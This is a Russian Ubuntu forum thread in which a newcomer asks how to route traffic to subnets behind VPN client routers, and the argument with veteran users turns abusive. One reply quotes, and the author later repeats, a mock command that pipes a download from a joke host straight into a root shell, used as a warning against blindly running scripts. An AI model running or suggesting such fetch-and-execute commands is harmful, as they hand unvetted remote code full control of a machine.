Форум русскоязычного сообщества Ubuntu


Хотите сделать посильный вклад в развитие Ubuntu и русскоязычного сообщества?
Помогите нам с документацией!

Автор Тема: Не пингуется сеть за маршрутизором-клиентом VPN  (Прочитано 1023 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн GTDOGg

  • Автор темы
  • Новичок
  • *
  • Сообщений: 5
  • No pain - No Gain
    • Просмотр профиля
Привет. Новичок в Ubuntu и столкнулся с бедой которую никак не могу победить. Есть Ubuntu 14.04 на которой поднят VPN по этой инструкции https://habrahabr.ru/post/243915/. Проблема такова. При подключении к VPN серверу через точку доступа не пингуется сеть которая раздается этой точкой доступа. Т.е. сеть созданая самим сервером и явля.щаяся ip адресом WAN (PPP0,PPP1 и .т.д.) пингуется с обоих концов. К домену подключаюсь на раз. локальные ресурсы видны и DNS работают на ура. Но пакеты в локальной подсети с клиентов VPN приходят и уходят с адреса VPN сервера который так же находится в локальной подсети. 192.168.0.\24 локальная сеть с доменом DHCP и DNS в ней 192.168.0.20 VPN сервер. 192.168.1\24 выдаваемые адреса клиентам VPN (подключившимся маршрутизаторам (точка доступа) 192.168.2\24 192.168.3\24 и выше адреса DHCP самих точек доступа. Не могу из локальной сети достучатся до клиентов за точками доступа. Повторюсь они локальную сеть видят и все можно оставить так. но хочется еще и управлять удаленно клиентами. route add пробовал результатов нет. в локальной сети маршруты прописаны и адреса полученые точками доступа прингуются как с сервера так и между собой но вот адресные пространсва за ними никак. Сильно не пинайте))

Оффлайн fisher74

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 13751
    • Просмотр профиля
Камменты не читаем...
(Нажмите, чтобы показать/скрыть)

Показывайте конфиги и диагностику сети
Принимаю благодарности в WMR и WMZ на кошельки:
R158160676909 и Z313280060764

Оффлайн GTDOGg

  • Автор темы
  • Новичок
  • *
  • Сообщений: 5
  • No pain - No Gain
    • Просмотр профиля
Камменты не читаем...
(Нажмите, чтобы показать/скрыть)

Показывайте конфиги и диагностику сети
1. Не нужно оскорблять незнакомых людей
2. Что бы ускорить процес получения ответа - оставл ссыль на ту инструкцию в которой то же самое что у меня, только ставил я ее отдельно  x2ltpd+openswan поэтому за мою безопасноть и конфиденциальность данных не переживайте.
3. Конфиги чего конкретно интересуют?

Оффлайн fisher74

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 13751
    • Просмотр профиля
1. Что Вы считаете оскорблением? То была цитата каммента, указанной Вами статьи на хабре, что подтверждает, что камменты Вы не читали.
2. На Вашу конфиденциальность мне фиолетово
3. Так как Вы отдельно ставили данные инструменты, то должны знать как это всё работает и какие конфиги настраивались и используются. И меня они совершенно не интересуют. За помощью пришли Вы, а не мы. Соответсвенно наиболее заинтересованное лицо - именно Вы.
Принимаю благодарности в WMR и WMZ на кошельки:
R158160676909 и Z313280060764

Оффлайн GTDOGg

  • Автор темы
  • Новичок
  • *
  • Сообщений: 5
  • No pain - No Gain
    • Просмотр профиля
Спасибо за "помощь", как всегда спасение утопающих - дело рук самих утопающих" Пришел за советом - получил нравоучения и невнятные указания от "Гуру". Форумы. такие форумы. Визин купите.

Оффлайн fisher74

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 13751
    • Просмотр профиля
Так Вы сами с первого сообщения начали лукавить: "поднят VPN по этой инструкции", а дальше " в которой то же самое что у меня, только ставил я ее отдельно". Ничего, что в той инструкции нет как настраивали VPN, кроме "запустите скрипт". То есть Вам пришлось самим разбираться с их настройкой. Так покажите свои наработки, а мы подскажем где проблема.
Принимаю благодарности в WMR и WMZ на кошельки:
R158160676909 и Z313280060764

Оффлайн GTDOGg

  • Автор темы
  • Новичок
  • *
  • Сообщений: 5
  • No pain - No Gain
    • Просмотр профиля
Так Вы сами с первого сообщения начали лукавить: "поднят VPN по этой инструкции", а дальше " в которой то же самое что у меня, только ставил я ее отдельно". Ничего, что в той инструкции нет как настраивали VPN, кроме "запустите скрипт". То есть Вам пришлось самим разбираться с их настройкой. Так покажите свои наработки, а мы подскажем где проблема.
Я не так хорошо владею английскими и Ubuntu, что-бы самому разобраться в том скрипте. Просто я его вначале поставил, а потом помотрел что он ставил. Потом нашел еще одну инструкцию http://xray-dx.blogspot.com.by/2015/04/vpn.html где мои предположения по поводу установленых программ подтвердились. Разобрался я только в том, что и как настроить, что-бы заработал VPN. Зачем мне все это было писать? И так получалась здоровенная портянка. Я прекрасно понимаю, что нужно адресовать пакеты из ван в лан, но как это делается в Ubuntu не знаю, ибо пользовался только пропиетарщиной от мелкомягких. Сейчас хочу настроить стабильный VPN сервер который будет подниматься маршрутизаторами из разнеых мест и при необходимости андроидами айфонами и прочими железяками, поэтому не OpenVPN. Сделать это хочу недорого, ибо организация небольшая и для 40 юзверей в разных концах города и области не (цитата руководства) ненужны домены впны и прочие приблуды, поэтому не интернет-шлюзы site-to-site типа микротик или тот же циско.
Вот стоило это писать?
По поводу конфигов: Что нужно было выкладывать? конфу xl2tpd? rd.local? надеялся что просто ткнут в простую команду типа route или iptable и все заработает, ибо и так все работает просто за маршрутизатор не выходит.

Пользователь добавил сообщение 20 Июль 2016, 15:28:28:
схема сети

vpn server (192.168.0.20 - проброс портов - белый IP) - vpn client (маршрутизатор подключенный к интернету (адрес выданый ему vpn server 192.168.1.209 (этот адрес пингуется отовсюду и с других клиентов и из любых сетей при должной настройке маршрутизации)- 192.168.2.\24 - компьютер подключенный к маршрутизатору (именно его мне нужно увидеть с vpn-server)
« Последнее редактирование: 20 Июль 2016, 15:28:28 от GTDOGg »

Оффлайн AnrDaemon

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 26086
    • Просмотр профиля
Для здоровенных портянок есть спойлеры.
А каждая незащищённая машина в интернете - это угроза всему интернету. Т.е. мне, лично. И заявления в духе "я ничего не знаю, curl -s http://cool.guys.ch/hackmeplease | sudo sh -c - УМЕНЯВСЁРАБОТАЕТ!" воспринимаю не иначе, как угрозу моей личной безопасности.
Хотите получить помощь? Потрудитесь представить запрошенную информацию в полном объёме.

Прежде чем [Отправить], нажми [Просмотр] и прочти собственное сообщение. Сам-то понял, что написал?…

Оффлайн GTDOGg

  • Автор темы
  • Новичок
  • *
  • Сообщений: 5
  • No pain - No Gain
    • Просмотр профиля
Еще один доморощеный учитель. Идите в жопу господа хорошие, раз для вас религиозное следование "обосри ближнего своего" важнее помощи. ЕЩЕ РАЗ КРУПНО!!!! Плевать на то, что я делал. Конкретно как сервер заставить видеть сеть за роутером подключенным к этому VPN серверу в Ubuntu? Я не особо понимаю как сдесь работает трансляция NAT фаервол и маршрутизация трафика.  это сука сложный вопрос? или вы, считающие себя невзебенными гуру с двойным шифрованием каналов и петляющими ip-адресами можете только флудить? Если нужны конфиги - какие? я не очень хорошо разбираюсь в Ubuntu.

Пользователь добавил сообщение 21 Июль 2016, 09:50:12:
Для здоровенных портянок есть спойлеры.
А каждая незащищённая машина в интернете - это угроза всему интернету. Т.е. мне, лично. И заявления в духе "я ничего не знаю, curl -s http://cool.guys.ch/hackmeplease | sudo sh -c - УМЕНЯВСЁРАБОТАЕТ!" воспринимаю не иначе, как угрозу моей личной безопасности.
Прежде чем говорить о том что те или иные скрипты содержат бэкдоры или прочие закладки, может стоит ознакомиться с их содержанием? InstaVPN это вещь, благодаря которой неопытный юзер Ubuntu или Дебиан, как я например, сможет настроить быстро и без лишних взрывающих мозг подробностей то что нужно, а это первое что может популяризировать платформу открытого ПО и ОС. Чем больше адептов- тем качественнее продукт должен получиться, а Ubuntu из ясель не может выбраться благодаря тому что нет подробных и адекватных инструкций, как в той же самой винде, где всего то и нужно башлять деньги и жать две три кнопки. Исходники InstaVPN выложены на gitHub без сокрытия и их можно посмотреть. При всем моем скудоумии в Ubuntu посмотрел что делает этот скрипт и ничего компрометирующего автора не нашел. Но кому я все это? "Я Д'Артаньян - все пидорасы!" - девиз вашей пиздобратии.
« Последнее редактирование: 21 Июль 2016, 09:50:12 от GTDOGg »

Оффлайн fisher74

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 13751
    • Просмотр профиля
(Нажмите, чтобы показать/скрыть)
Принимаю благодарности в WMR и WMZ на кошельки:
R158160676909 и Z313280060764

 

Страница сгенерирована за 0.064 секунд. Запросов: 24.